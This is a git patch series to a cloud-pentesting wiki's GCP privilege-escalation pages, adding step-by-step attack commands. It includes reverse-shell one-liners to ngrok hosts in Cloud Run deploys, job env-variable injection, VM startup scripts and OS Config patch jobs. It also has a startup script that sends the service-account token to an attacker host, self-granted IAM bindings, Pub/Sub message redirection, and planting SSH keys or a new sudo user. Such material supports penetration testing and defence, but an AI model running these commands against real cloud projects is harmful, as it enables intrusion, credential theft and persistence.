@@ -65,8 +68,6 @@ If you have the **`iam.serviceAccounts.implicitDelegation`** permission on a Ser Note that according to the [**documentation**](https://cloud.google.com/iam/docs/understanding-service-accounts), the delegation of `gcloud` only works to generate a token using the [**generateAccessToken()**](https://cloud.google.com/iam/credentials/reference/rest/v1/projects.serviceAccounts/generateAccessToken) method. So here you have how to get a token using the API directly: -<details><summary>Generate access token with delegation using API</summary> - ```bash curl -X POST \ 'https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/'"${TARGET_SERVICE_ACCOUNT}"':generateAccessToken' \ @@ -78,8 +79,6 @@ curl -X POST \ }' ``` -</details> - You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/5-iam.serviceAccounts.implicitDelegation.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.implicitDelegation.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/). ### `iam.serviceAccounts.signBlob` @@ -98,12 +97,10 @@ You can find a script to automate the [**creation, exploit and cleaning of a vul An attacker with the mentioned permissions will be able to **add IAM policies to service accounts**. You can abuse it to **grant yourself** the permissions you need to impersonate the service account. In the following example we are granting ourselves the `roles/iam.serviceAccountTokenCreator` role over the interesting SA: -<details><summary>Add IAM policy binding to service account</summary> - ```bash gcloud iam service-accounts add-iam-policy-binding "${VICTIM_SA}@${PROJECT_ID}.iam.gserviceaccount.com" \ - --member="user:username@domain.com" \ - --role="roles/iam.serviceAccountTokenCreator" + --member="user:username@domain.com" \ + --role="roles/iam.serviceAccountTokenCreator" # If you still have prblem grant yourself also this permission gcloud iam service-accounts add-iam-policy-binding "${VICTIM_SA}@${PROJECT_ID}.iam.gserviceaccount.com" \ \ @@ -111,8 +108,6 @@ gcloud iam service-accounts add-iam-policy-binding "${VICTIM_SA}@${PROJECT_ID}.i --role="roles/iam.serviceAccountUser" ``` -</details> - You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/d-iam.serviceAccounts.setIamPolicy.sh)**.** ### `iam.serviceAccounts.actAs` @@ -135,8 +130,6 @@ According to this [**interesting post**](https://medium.com/google-cloud/authent You can generate an OpenIDToken (if you have the access) with: -<details><summary>Generate OpenID token for service account</summary> - ```bash # First activate the SA with iam.serviceAccounts.getOpenIdToken over the other SA gcloud auth activate-service-account --key-file=/path/to/svc_account.json @@ -144,18 +137,12 @@ gcloud auth activate-service-account --key-file=/path/to/svc_account.json gcloud auth print-identity-token "${ATTACK_SA}@${PROJECT_ID}.iam.gserviceaccount.com" --audiences=https://example.com ``` -</details> - Then you can just use it to access the service with: -<details><summary>Use OpenID token to authenticate</summary> - ```bash curl -v -H "Authorization: Bearer id_token" https://some-cloud-run-uc.a.run.app ``` 
-</details> - Some services that support authentication via this kind of tokens are: - [Google Cloud Run](https://cloud.google.com/run/) diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.md index f993e1dfc9..447e6b768a 100644 --- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.md +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.md @@ -10,9 +10,13 @@ Get more information in: ../gcp-services/gcp-pub-sub.md {{#endref}} -### `pubsub.snapshots.create` +### `pubsub.snapshots.create` (`pubsub.topics.attachSubscription`) -The snapshots of topics **contain the current unACKed messages and every message after it**. You could create a snapshot of a topic to **access all the messages**, **avoiding access the topic directly**. +The snapshots of topics **contain the current unACKed messages and every message after it**. You could create a snapshot of a topic to **access all the messages**, **avoiding access the topic directly**. + +```bash +gcloud pubsub subscriptions create <subscription_name> --topic <topic_name> --push-endpoint https://<URL_to_push_to> +``` ### **`pubsub.snapshots.setIamPolicy`** @@ -30,10 +34,45 @@ Set your own URL as push endpoint to steal the messages. Access messages using the subscription. +```bash +gcloud pubsub subscriptions pull <SUSCRIPTION> \ + --limit=50 \ + --format="json" \ + --project=<PROJECTID> +``` + ### `pubsub.subscriptions.setIamPolicy` Give yourself any of the preiovus permissions +```bash +# Add Binding +gcloud pubsub subscriptions add-iam-policy-binding <SUSCRIPTION_NAME> \ + --member="serviceAccount:<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com" \ + --role="<ROLE_OR_CUSTOM_ROLE>" \ + --project="<PROJECT_ID>" + +# Remove Binding +gcloud pubsub subscriptions remove-iam-policy-binding <SUSCRIPTION_NAME> \ + --member="serviceAccount:<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com" \ + --role="<ROLE_OR_CUSTOM_ROLE>" \ + --project="<PROJECT_ID>" + +# Change Policy +gcloud pubsub subscriptions set-iam-policy <SUSCRIPTION_NAME> \ + <(echo '{ + "bindings": [ + { + "role": "<ROLE_OR_CUSTOM_ROLE>", + "members": [ + "serviceAccount:<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com" + ] + } + ] + }') \ + --project=<PROJECT_ID> +``` + {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md index 5313d0e003..3b02f66231 100644 --- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md @@ -22,9 +22,6 @@ Note that when using `gcloud run deploy` instead of just creating the service ** Like the previous one but updating a service: -<details> -<summary>Deploy Cloud Run service with reverse shell</summary> - ```bash # Launch some web server to listen in port 80 so the service works echo "python3 -m http.server 80;sh -i >& /dev/tcp/0.tcp.eu.ngrok.io/14348 0>&1" | base64 @@ -41,19 +38,32 @@ gcloud run deploy hacked \ # If you don't have permissions to use "--allow-unauthenticated", dont use it ``` -</details> - ### `run.services.setIamPolicy` Give yourself previous permissions over cloud Run. 
+```bash +# Change policy +gcloud run services set-iam-policy <SERVICE_NAME> <POLICY_FILE>.json \ + --region=us-central1 + +# Add binding +gcloud run services add-iam-policy-binding <SERVICE_NAME> \ + --member="allUsers" \ + --role="roles/run.invoker" \ + --region=us-central1 + +# Remove binding +gcloud run services remove-iam-policy-binding <SERVICE_NAME> \ + --member="allUsers" \ + --role="roles/run.invoker" \ + --region=us-central1 +``` + ### `run.jobs.create`, `run.jobs.run`, `iam.serviceaccounts.actAs`,(`run.jobs.get`) Launch a job with a reverse shell to steal the service account indicated in the command. You can find an [**exploit here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/m-run.jobs.create.sh). -<details> -<summary>Create Cloud Run job with reverse shell</summary> - ```bash gcloud beta run jobs create jab-cloudrun-3326 \ --image=ubuntu:latest \ @@ -64,15 +74,10 @@ gcloud beta run jobs create jab-cloudrun-3326 \ ``` -</details> - ### `run.jobs.update`,`run.jobs.run`,`iam.serviceaccounts.actAs`,(`run.jobs.get`) Similar to the previous one it's possible to **update a job and update the SA**, the **command** and **execute it**: -<details> -<summary>Update Cloud Run job and execute with reverse shell</summary> - ```bash gcloud beta run jobs update hacked \ --image=mubuntu:latest \ @@ -83,25 +88,35 @@ gcloud beta run jobs update hacked \ --execute-now ``` -</details> - ### `run.jobs.setIamPolicy` Give yourself the previous permissions over Cloud Jobs. +```bash +# Change policy +gcloud run jobs set-iam-policy <JOB_NAME> <POLICY_FILE>.json \ + --region=us-central1 + +# Add binding +gcloud run jobs add-iam-policy-binding <JOB_NAME> \ + --member="serviceAccount:<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com" \ + --role="roles/run.invoker" \ + --region=us-central1 + +# Remove binding +gcloud run jobs remove-iam-policy-binding <JOB_NAME> \ + --member="serviceAccount:<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com" \ + --role="roles/run.invoker" \ + --region=us-central1 +``` ### `run.jobs.run`, `run.jobs.runWithOverrides`, (`run.jobs.get`) Abuse the env variables of a job execution to execute arbitrary code and get a reverse shell to dump the contents of the container (source code) and access the SA inside the metadata: -<details> -<summary>Execute Cloud Run job with environment variable exploitation</summary> - ```bash gcloud beta run jobs execute job-name --region <region> --update-env-vars="PYTHONWARNINGS=all:0:antigravity.x:0:0,BROWSER=/bin/bash -c 'bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/14195 0>&1' #%s" ``` -</details> - ## References - [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/) diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.md index 03905af538..9a19163faf 100644 --- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.md +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.md @@ -41,6 +41,13 @@ gcloud secrets add-iam-policy-binding <scret-name> \ --role="roles/secretmanager.secretAccessor" ``` +Or revoke policies with: +```bash +gcloud secrets remove-iam-policy-binding <secret-name> \ +--member="serviceAccount:<sa-name>@<PROJECT_ID>.iam.gserviceaccount.com" \ + --role="roles/secretmanager.secretAccessor" +``` + </details> 
{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md index fd5a53e066..b0872a07f6 100644 --- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md @@ -21,10 +21,70 @@ This permission allows you to **download files stored inside Cloud Storage**. Th You can give you permission to **abuse any of the previous scenarios of this section**. +```bash +# Add binding +gcloud storage objects add-iam-policy-binding gs://<BUCKET_NAME>/<OBJECT_NAME> \ + --member="<MEMBER_TYPE>:<MEMBER_IDENTIFIER>" \ + --role="<ROLE>" \ + --project=<PROJECT_ID> + +# Remove binding +gcloud storage objects remove-iam-policy-binding gs://<BUCKET_NAME>/<OBJECT_NAME> \ + --member="<MEMBER_TYPE>:<MEMBER_IDENTIFIER>" \ + --role="<ROLE>" \ + --project=<PROJECT_ID> + +# Change Policy +gcloud storage objects set-iam-policy gs://<BUCKET_NAME>/<OBJECT_NAME> - \ + --project=<PROJECT_ID> <<'POLICY' +{ + "bindings": [ + { + "role": "<ROLE>", + "members": [ + "<MEMBER_TYPE>:<MEMBER_IDENTIFIER>" + ] + } + ] +} +POLICY + +``` + ### **`storage.buckets.setIamPolicy`** For an example on how to modify permissions with this permission check this page: +```bash +# Add binding +gcloud storage buckets add-iam-policy-binding gs://<MY_BUCKET> \ + --member="<MEMBER_TYPE>:<MEMBER_IDENTIFIER>" \ + --role=<ROLE> \ + --project=<MY_PROJECT> + +# Remove binding +gcloud storage buckets remove-iam-policy-binding gs://<MY_BUCKET> \ + --member="<MEMBER_TYPE>:<MEMBER_IDENTIFIER>" \ + --role=<ROLE> \ + --project=<MY_PROJECT> + +# Change policy +gcloud storage buckets set-iam-policy gs://<BUCKET_NAME> - \ + --project=<PROJECT_ID> <<'POLICY' +{ + "bindings": [ + { + "role": "<ROLE>", + "members": [ + "<MEMBER_TYPE>:<MEMBER_IDENTIFIER>" + ] + } + ] +} +POLICY + +``` + {{#ref}} ../gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.md {{#endref}} @@ -33,8 +93,6 @@ For an example on how to modify permissions with this permission check this page Cloud Storage's "interoperability" feature, designed for **cross-cloud interactions** like with AWS S3, involves the **creation of HMAC keys for Service Accounts and users**. An attacker can exploit this by **generating an HMAC key for a Service Account with elevated privileges**, thus **escalating privileges within Cloud Storage**. While user-associated HMAC keys are only retrievable via the web console, both the access and secret keys remain **perpetually accessible**, allowing for potential backup access storage. Conversely, Service Account-linked HMAC keys are API-accessible, but their access and secret keys are not retrievable post-creation, adding a layer of complexity for continuous access. -<details><summary>Create and use HMAC key for privilege escalation</summary> - ```bash # Create key gsutil hmac create <sa-email> # You might need to execute this inside a VM instance @@ -65,8 +123,6 @@ gsutil ls gs://[BUCKET_NAME] gcloud config set pass_credentials_to_gsutil true ``` -</details> - Another exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/storage.hmacKeys.create.py). 
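+
+Since the GCS XML API is S3-compatible, the generated HMAC key pair can also be consumed from standard S3 tooling. A minimal sketch (the HMAC access ID/secret and bucket name below are hypothetical values, and it assumes the impersonated SA can list the bucket):
+
+```bash
+# Use the SA's HMAC key with the AWS CLI against the GCS S3-compatible endpoint
+AWS_ACCESS_KEY_ID='<hmac-access-id>' AWS_SECRET_ACCESS_KEY='<hmac-secret>' \
+  aws s3 ls s3://<bucket-name> --endpoint-url https://storage.googleapis.com
+```
+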
 ### `storage.objects.create`, `storage.objects.delete` = Storage Write permissions

From 862cfc77325ada400e13c513be57e7a1ad884786 Mon Sep 17 00:00:00 2001
From: SirBroccoli <carlospolop@gmail.com>
Date: Wed, 26 Nov 2025 17:12:13 +0100
Subject: [PATCH 2/3] Update gcp-cloud-run-post-exploitation.md

---
 .../gcp-post-exploitation/gcp-cloud-run-post-exploitation.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md
index cd5588176f..2597044920 100644
--- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md
@@ -11,7 +11,7 @@ For more information about Cloud Run check:
 {{#endref}}
 
 ### Delete CloudRun Job
-The `run.services.delete` and `run.services.get permissions`, as well as run.jobs.delete, allow an identity to completely delete a Cloud Run service or job, including its configuration and history. In the hands of an attacker, this can cause immediate disruption to applications or critical workflows, resulting in a denial of service (DoS) for users and systems that depend on the service logic or essential scheduled tasks.
+The `run.services.delete` and `run.services.get` permissions, as well as `run.jobs.delete`, allow an identity to completely delete a Cloud Run service or job, including its configuration and history. In the hands of an attacker, this can cause immediate disruption to applications or critical workflows, resulting in a denial of service (DoS) for users and systems that depend on the service logic or essential scheduled tasks.
 
 To delete a job, the following operation can be performed.
 ```bash

From b6af849e117658cdd8a7d430ac9679786aa1b00f Mon Sep 17 00:00:00 2001
From: JaimePolop <jaimepolop@gmail.com>
Date: Wed, 26 Nov 2025 17:22:08 +0100
Subject: [PATCH 3/3] fix

---
 .../gcp-compute-privesc/README.md             | 151 ++++++++++++++++++
 .../gcp-add-custom-ssh-metadata.md            | 100 ++++++++++++
 .../gcp-firebase-privesc.md                   |   3 -
 3 files changed, 251 insertions(+), 3 deletions(-)
 create mode 100644 src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md
 create mode 100644 src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md

diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md
new file mode 100644
index 0000000000..104bae5a6e
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md
@@ -0,0 +1,151 @@
+# GCP - Compute Privesc
+
+{{#include ../../../../banners/hacktricks-training.md}}
+
+## Compute
+
+For more information about Compute and VPC (network) in GCP check:
+
+{{#ref}}
+../../gcp-services/gcp-compute-instances-enum/
+{{#endref}}
+
+> [!CAUTION]
+> Note that to perform all the privilege escalation attacks that require modifying the metadata of the instance (like adding new users and SSH keys) it's **needed that you have `actAs` permissions over the SA attached to the instance**, even if the SA is already attached!
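+
+A quick way to check whether your current identity actually holds `actAs` over the instance's attached SA is the IAM `testIamPermissions` endpoint (the project ID and SA email below are hypothetical placeholders):
+
+```bash
+curl -s -X POST \
+  -H "Authorization: Bearer $(gcloud auth print-access-token)" \
+  -H "Content-Type: application/json" \
+  -d '{"permissions": ["iam.serviceAccounts.actAs"]}' \
+  "https://iam.googleapis.com/v1/projects/<project-id>/serviceAccounts/<sa-email>:testIamPermissions"
+```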
+
+### `compute.projects.setCommonInstanceMetadata`
+
+With that permission you can **modify** the **metadata** information of an **instance** and change the **authorized keys of a user**, or **create** a **new user with sudo** permissions. Therefore, you will be able to SSH into any VM instance and steal the GCP Service Account the Instance is running with.\
+Limitations:
+
+- Note that GCP Service Accounts running in VM instances by default have a **very limited scope**
+- You will need to be **able to contact the SSH** server to login
+
+For more information about how to exploit this permission check:
+
+{{#ref}}
+gcp-add-custom-ssh-metadata.md
+{{#endref}}
+
+You could also perform this attack by adding a new startup-script and rebooting the instance:
+
+```bash
+gcloud compute instances add-metadata my-vm-instance \
+  --metadata startup-script='#!/bin/bash
+bash -i >& /dev/tcp/0.tcp.eu.ngrok.io/18347 0>&1 &'
+
+gcloud compute instances reset my-vm-instance
+```
+
+### `compute.instances.setMetadata`
+
+This permission gives the **same privileges as the previous permission** but over a specific instance instead of the whole project. The **same exploits and limitations as for the previous section apply**.
+
+### `compute.instances.setIamPolicy`
+
+This kind of permission will allow you to **grant yourself a role with the previous permissions** and escalate privileges abusing them. Here is an example adding `roles/compute.admin` to a Service Account:
+
+```bash
+export SERVER_SERVICE_ACCOUNT=YOUR_SA
+export INSTANCE=YOUR_INSTANCE
+export ZONE=YOUR_INSTANCE_ZONE
+
+cat <<EOF > policy.json
+bindings:
+- members:
+  - serviceAccount:$SERVER_SERVICE_ACCOUNT
+  role: roles/compute.admin
+version: 1
+EOF
+
+gcloud compute instances set-iam-policy $INSTANCE policy.json --zone=$ZONE
+```
+
+### **`compute.instances.osLogin`**
+
+If **OSLogin is enabled in the instance**, with this permission you can just run **`gcloud compute ssh [INSTANCE]`** and connect to the instance. You **won't have root privs** inside the instance.
+
+> [!TIP]
+> In order to successfully login with this permission inside the VM instance, you need to have the `iam.serviceAccounts.actAs` permission over the SA attached to the VM.
+
+### **`compute.instances.osAdminLogin`**
+
+If **OSLogin is enabled in the instance**, with this permission you can just run **`gcloud compute ssh [INSTANCE]`** and connect to the instance. You will have **root privs** inside the instance.
+
+> [!TIP]
+> In order to successfully login with this permission inside the VM instance, you need to have the `iam.serviceAccounts.actAs` permission over the SA attached to the VM.
+
+### `compute.instances.create`, `iam.serviceAccounts.actAs`, `compute.disks.create`, `compute.instances.setMetadata`, `compute.instances.setServiceAccount`, `compute.subnetworks.use`, `compute.subnetworks.useExternalIp`
+
+It's possible to **create a virtual machine with an assigned Service Account and steal the token** of the service account accessing the metadata to escalate privileges to it.
+
+The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/compute.instances.create.py).
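+
+A manual sketch of the same idea (the instance name, zone, machine type and callback host below are hypothetical attacker-chosen values; the target SA is attached with `--service-account`):
+
+```bash
+# Create a VM with the privileged SA attached and a startup script that
+# exfiltrates the SA token from the metadata server to an attacker host
+gcloud compute instances create privesc-instance \
+    --zone=us-central1-a \
+    --machine-type=e2-micro \
+    --service-account=<privileged-sa>@<project-id>.iam.gserviceaccount.com \
+    --scopes=https://www.googleapis.com/auth/cloud-platform \
+    --metadata=startup-script='#!/bin/bash
+TOKEN=$(curl -s -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token")
+curl -s -X POST -d "$TOKEN" https://<attacker-host>/token'
+```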
+
+### `osconfig.patchDeployments.create` | `osconfig.patchJobs.exec`
+
+If you have the **`osconfig.patchDeployments.create`** or **`osconfig.patchJobs.exec`** permissions you can create a [**patch job or deployment**](https://blog.raphael.karger.is/articles/2022-08/GCP-OS-Patching). This will enable you to move laterally in the environment and gain code execution on all the compute instances within a project.
+
+Note that at the moment you **don't need `actAs` permission** over the SA attached to the instance.
+
+If you want to manually exploit this you will need to create either a [**patch job**](https://github.com/rek7/patchy/blob/main/pkg/engine/patches/patch_job.json) **or** [**deployment**](https://github.com/rek7/patchy/blob/main/pkg/engine/patches/patch_deployment.json)**.**\
+For a patch job run:
+
+```bash
+cat > /tmp/patch-job.sh <<EOF
+#!/bin/bash
+bash -i >& /dev/tcp/0.tcp.eu.ngrok.io/18442 0>&1
+EOF
+
+gsutil cp /tmp/patch-job.sh gs://readable-bucket-by-sa-in-instance/patch-job.sh
+
+# Get the generation number
+gsutil ls -a gs://readable-bucket-by-sa-in-instance
+
+gcloud --project=$PROJECT_ID compute os-config patch-jobs execute \
+    --instance-filter-names=zones/us-central1-a/instances/<instance-name> \
+    --pre-patch-linux-executable=gs://readable-bucket-by-sa-in-instance/patch-job.sh#<generation-number> \
+    --reboot-config=never \
+    --display-name="Managed Security Update" \
+    --duration=300s
+```
+
+To deploy a patch deployment:
+
+```bash
+gcloud compute os-config patch-deployments create <name> ...
+```
+
+The tool [patchy](https://github.com/rek7/patchy) could be used in the past to exploit this misconfiguration (but it's no longer working).
+
+**An attacker could also abuse this for persistence.**
+
+### `compute.machineImages.setIamPolicy`
+
+**Grant yourself extra permissions** to a compute image.
+
+### `compute.snapshots.setIamPolicy`
+
+**Grant yourself extra permissions** to a disk snapshot.
+
+### `compute.disks.setIamPolicy`
+
+**Grant yourself extra permissions** to a disk.
+
+### Bypass Access Scopes
+
+Following this link you can find some [**ideas to try to bypass access scopes**](../index.html).
+
+### Local Privilege Escalation in GCP Compute instance
+
+{{#ref}}
+../gcp-local-privilege-escalation-ssh-pivoting.md
+{{#endref}}
+
+## References
+
+- [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/)
+
+{{#include ../../../../banners/hacktricks-training.md}}
+
+
+
diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md
new file mode 100644
index 0000000000..a68e756b51
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md
@@ -0,0 +1,100 @@
+# GCP - Add Custom SSH Metadata
+
+{{#include ../../../../banners/hacktricks-training.md}}
+
+## Modifying the metadata <a href="#modifying-the-metadata" id="modifying-the-metadata"></a>
+
+Metadata modification on an instance could lead to **significant security risks if an attacker gains the necessary permissions**.
+
+### **Incorporation of SSH Keys into Custom Metadata**
+
+On GCP, **Linux systems** often execute scripts from the [Python Linux Guest Environment for Google Compute Engine](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts). A critical component of this is the [accounts daemon](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts), which is designed to **regularly check** the instance metadata endpoint for **updates to the authorized SSH public keys**.
+
+Therefore, if an attacker can modify custom metadata, they could make the daemon find a new public key, which will be processed and **integrated into the local system**. The key will be added to the `~/.ssh/authorized_keys` file of an **existing user, or a new user with `sudo` privileges may be created**, depending on the key's format. This allows the attacker to compromise the host.
+
+### **Add SSH key to existing privileged user**
+
+1. **Examine Existing SSH Keys on the Instance:**
+
+   - Execute the command to describe the instance and its metadata to locate existing SSH keys. The relevant section in the output will be under `metadata`, specifically the `ssh-keys` key.
+
+   ```bash
+   gcloud compute instances describe [INSTANCE] --zone [ZONE]
+   ```
+
+   - Pay attention to the format of the SSH keys: the username precedes the key, separated by a colon.
+
+2. **Prepare a Text File for SSH Key Metadata:**
+   - Save the details of usernames and their corresponding SSH keys into a text file named `meta.txt`. This is essential for preserving the existing keys while adding new ones.
+3. **Generate a New SSH Key for the Target User (`alice` in this example):**
+
+   - Use the `ssh-keygen` command to generate a new SSH key, ensuring that the comment field (`-C`) matches the target username.
+
+   ```bash
+   ssh-keygen -t rsa -C "alice" -f ./key -P "" && cat ./key.pub
+   ```
+
+   - Add the new public key to `meta.txt`, mimicking the format found in the instance's metadata.
+
+4. **Update the Instance's SSH Key Metadata:**
+
+   - Apply the updated SSH key metadata to the instance using the `gcloud compute instances add-metadata` command.
+
+   ```bash
+   gcloud compute instances add-metadata [INSTANCE] --metadata-from-file ssh-keys=meta.txt
+   ```
+
+5. **Access the Instance Using the New SSH Key:**
+
+   - Connect to the instance with SSH using the new key, accessing the shell in the context of the target user (`alice` in this example).
+
+   ```bash
+   ssh -i ./key alice@localhost
+   sudo id
+   ```
+
+### **Create a new privileged user and add an SSH key**
+
+If no interesting user is found, it's possible to create a new one which will be given `sudo` privileges:
+
+```bash
+# define the new account username
+NEWUSER="definitelynotahacker"
+
+# create a key
+ssh-keygen -t rsa -C "$NEWUSER" -f ./key -P ""
+
+# create the input meta file
+NEWKEY="$(cat ./key.pub)"
+echo "$NEWUSER:$NEWKEY" > ./meta.txt
+
+# update the instance metadata
+gcloud compute instances add-metadata [INSTANCE_NAME] --metadata-from-file ssh-keys=meta.txt
+
+# ssh to the new account
+ssh -i ./key "$NEWUSER"@localhost
+```
+
+### SSH keys at project level <a href="#sshing-around" id="sshing-around"></a>
+
+It's possible to broaden the reach of SSH access to multiple Virtual Machines (VMs) in a cloud environment by **applying SSH keys at the project level**.
This approach allows SSH access to any instance within the project that hasn't explicitly blocked project-wide SSH keys. Here's a summarized guide: + +1. **Apply SSH Keys at the Project Level:** + + - Use the `gcloud compute project-info add-metadata` command to add SSH keys from `meta.txt` to the project's metadata. This action ensures that the SSH keys are recognized across all VMs in the project, unless a VM has the "Block project-wide SSH keys" option enabled. + + ```bash + gcloud compute project-info add-metadata --metadata-from-file ssh-keys=meta.txt + ``` + +2. **SSH into Instances Using Project-Wide Keys:** + - With project-wide SSH keys in place, you can SSH into any instance within the project. Instances that do not block project-wide keys will accept the SSH key, granting access. + - A direct method to SSH into an instance is using the `gcloud compute ssh [INSTANCE]` command. This command uses your current username and the SSH keys set at the project level to attempt access. + +## References + +- [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/) + +{{#include ../../../../banners/hacktricks-training.md}} + + diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-firebase-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-firebase-privesc.md index 2f80a58da3..caa8d1192b 100644 --- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-firebase-privesc.md +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-firebase-privesc.md @@ -464,9 +464,6 @@ The attacker gains access to the Firebase CLI credentials file. They can then co ```bash firebase projects:list ``` -## References - -- [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/) {{#include ../../../banners/hacktricks-training.md}}